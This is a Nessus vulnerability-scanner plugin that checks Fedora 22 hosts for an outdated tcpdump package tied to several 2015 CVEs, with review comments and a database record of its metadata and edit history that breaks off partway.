ID FEDORA_2015-4804.NASL Type nessus Reporter Tenable Modified 2015-10-19T00:00:00
Description
Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,
CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2015-4804.
#
include("compat.inc");
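# Registration branch: declares the plugin's metadata and then exits, so
# none of the host checks that follow it in the file run in this mode.
if (description)
{
  script_id(82556);
  script_version("$Revision: 1.3 $");
  script_cvs_date("$Date: 2015/10/19 23:06:18 $");

  # The advisory text in the "description" attribute names four CVEs as
  # fixed by this rebase. CVE-2015-2155 was absent from this list, so a
  # CVE-keyed search or report for it would not map to this plugin.
  script_cve_id("CVE-2015-0261", "CVE-2015-2153", "CVE-2015-2154", "CVE-2015-2155");
  # NOTE(review): only three Bugtraq IDs are listed; the ID matching
  # CVE-2015-2155 is not given in this file - add it once confirmed.
  script_bugtraq_id(73017, 73018, 73019);
  script_xref(name:"FEDORA", value:"2015-4804");

  script_name(english:"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(attribute:"synopsis", value:"The remote Fedora host is missing a security update.");

  # The string below spans several source lines; its continuation lines
  # stay at column 0 because leading whitespace would become part of the
  # reported text.
  script_set_attribute(attribute:"description", value:
"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,
CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.");

  # Upstream bug reports referenced by the advisory.
  script_set_attribute(attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1201792");
  script_set_attribute(attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1201795");
  script_set_attribute(attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1201797");
  # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?75b00466");

  script_set_attribute(attribute:"solution", value:"Update the affected tcpdump package.");

  # CVSS v2 base vector: network-reachable, low complexity, no
  # authentication, partial impact on confidentiality, integrity and
  # availability. Temporal vector: exploitability not defined, official
  # fix available, report confirmed.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
  # NOTE(review): the two exploitability attributes were set when the
  # plugin was written (2015). Re-check them against current exploit
  # intelligence before using them to prioritise remediation.
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  # "local": the result comes from package data collected on the host,
  # not from probing a network service.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:tcpdump");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22");

  script_set_attribute(attribute:"patch_publication_date", value:"2015/03/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/04/03");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015 Tenable Network Security, Inc.");
  script_family(english:"Fedora Local Security Checks");

  # ssh_get_info.nasl presumably populates the KB keys required below
  # (verify); the same keys are read again by the checks after this block.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}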
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Preconditions. Every audit() call below reports why the plugin cannot
# give a verdict instead of silently reporting the host as clean.

# Local checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}

# The release string must be present and must mention Fedora
# (">!<" is the "is not a substring of" operator).
release = get_kb_item("Host/RedHat/release");
if (isnull(release))
{
  audit(AUDIT_OS_NOT, "Fedora");
}
if ("Fedora" >!< release)
{
  audit(AUDIT_OS_NOT, "Fedora");
}

# Pull the numeric release out of the string; only Fedora 22 is in scope.
ver_match = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(ver_match))
{
  audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
}
os_ver = ver_match[1];
if (! ereg(pattern:"^22([^0-9]|$)", string:os_ver))
{
  audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver);
}

# Without the collected package list there is nothing to compare against.
if (!get_kb_item("Host/RedHat/rpm-list"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Only x86_64 and i386-i686 hosts are handled; any other architecture is
# reported as "not implemented".
cpu = get_kb_item("Host/cpu");
if (isnull(cpu))
{
  audit(AUDIT_UNKNOWN_ARCH);
}
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$")
{
  audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
}
# Package check. rpm_check() comes from rpm.inc; presumably it is true
# when the installed tcpdump is older than the reference build (verify
# against rpm.inc). This compares package versions only and says nothing
# about whether a tcpdump process started before the update is still
# running.
if (rpm_check(release:"FC22", reference:"tcpdump-4.7.3-1.fc22"))
{
  # Report on port 0; attach the rpm comparison report only when the
  # configured verbosity asks for it.
  if (report_verbosity > 0)
  {
    security_hole(port:0, extra:rpm_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}

# Not flagged: say whether tcpdump was tested and found unaffected, or
# was not installed at all.
tested = pkg_tests_get();
if (tested)
{
  audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
}
else
{
  audit(AUDIT_PACKAGE_NOT_INSTALLED, "tcpdump");
}
{"id": "FEDORA_2015-4804.NASL", "bulletinFamily": "scanner", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2015-04-03T00:00:00", "modified": "2015-10-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "reporter": "Tenable", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "type": "nessus", "lastseen": "2019-01-16T20:21:13", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "267e94d0ac34750b2836a182af385ea226a98cbd627f208527463542a8bce573", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "ebdf7e83bd7bce5ac84476b2fe2e176c", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2017-10-29T13:37:03", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:37:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "267e94d0ac34750b2836a182af385ea226a98cbd627f208527463542a8bce573", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "ebdf7e83bd7bce5ac84476b2fe2e176c", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2018-09-01T23:42:52", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:42:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:tcpdump", "cpe:/o:fedoraproject:fedora:22"], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "1f5c957094741b0aa4c09cf40f6b6ec97b8571f61056792d79c0863136060981", "hashmap": [{"hash": "0cd6bae46b6c121e3245ba39dbe92ae7", "key": "cvelist"}, {"hash": "1717dc64ce58819ecb43043c920ac1e0", "key": "pluginID"}, {"hash": "3bf9f335cf7133ec3558c5981a7a5c4b", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "837fe056656f2dca971f36770f2f076e", "key": "description"}, {"hash": "da24fa604e71295d422585026996451c", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "4734fd35f6702a811bc9c2931dc22d6c", "key": "href"}, {"hash": "281278142c1d4f94e3e5900b417d6b70", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "c132aa5866a601b1193cd8b0c108aeb2", "key": "references"}, {"hash": "ebdf7e83bd7bce5ac84476b2fe2e176c", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=82556", "id": "FEDORA_2015-4804.NASL", "lastseen": "2018-08-30T19:37:10", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "82556", "published": "2015-04-03T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1201795", "https://bugzilla.redhat.com/show_bug.cgi?id=1201792", "https://bugzilla.redhat.com/show_bug.cgi?id=1201797", "http://www.nessus.org/u?75b00466"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
2015-4804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82556);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:06:18 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4804\");\n\n script_name(english:\"Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75b00466\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"tcpdump-4.7.3-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "title": "Fedora 22 : tcpdump-4.7.3-1.fc22 (2015-4804)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:37:10"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2015-0261", "CVE-2015-2154", "CVE-2015-2153"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261, CVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
